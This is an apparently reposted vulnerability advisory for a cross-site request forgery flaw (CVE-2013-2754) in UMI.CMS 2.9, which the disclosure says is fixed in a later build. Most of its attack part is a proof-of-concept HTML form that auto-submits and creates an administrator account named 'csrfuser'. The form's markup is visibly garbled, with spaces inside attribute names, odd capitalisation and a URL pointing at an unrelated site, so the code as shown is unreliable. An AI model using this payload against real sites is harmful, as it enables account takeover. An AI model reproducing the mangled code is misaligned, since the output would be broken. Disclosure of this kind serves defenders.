UMI. CMS 2.9 CSRF Defect

Design product: UMI. CMS

Author: OOO Umisoft

Affected Versions: 2.9 and probably prior

Tested version: 2.9

Fixed: The developer has completed

Abstract:

High-Tech Bridge Security Research Lab discovered CSRF vulnerability in UMI. CMS, which can be exploited to perform Cross-Site Request Forgery (CSRF) attacks and create new administrator in the vulnerable application.

1) Cross-site Request Forgery (CSRF) in UMI. CMS: CVE-2013-2754

The application allows authorized administrator to perform certain sensitive actions via HTTP requests without making proper validity checks to verify the source of these HTTP requests. this can be exploited to perform any actions with administrator privileges, such as adding new administrator to the system.

A remote attacker can create a specially crafted webpage, trick a logged-in administrator to open it and create new user with administrative privileges.

A basic CSRF exploit below will create new administrator with "csrfuser" as a login and "password" as a password:

<Form action = "http: // www.2cto.com admin/users/add/user/do/" method = "post" name = "main">

<Input type = "hidden" name = "data [new] [login]" value = "csrfuser">

<Input type = "hidden" name = "data [new] [password] []" value = "password">

<Input type = "hidden" name = "data [new] [e-mail]" value = "user@mail.com">

<Input type = "hidden" name = "data [new] [is_activated]" value = "1">

<Input type = "hidden" name = "data [new] [fname]" value = "username">

<Input type = "hidden" name = "data [new] [groups] []" value = "1">

<Input type = "hidden" name = "data [new] [groups] []" value = "2">

<Input type = "hidden" name = "" value = "">

<Input type = "submit" id = "btn">

</Form>

<Script>

Document. main. submit ();

</Script>

Solution:

Upgrade to UMI. CMS 2.9 build 21905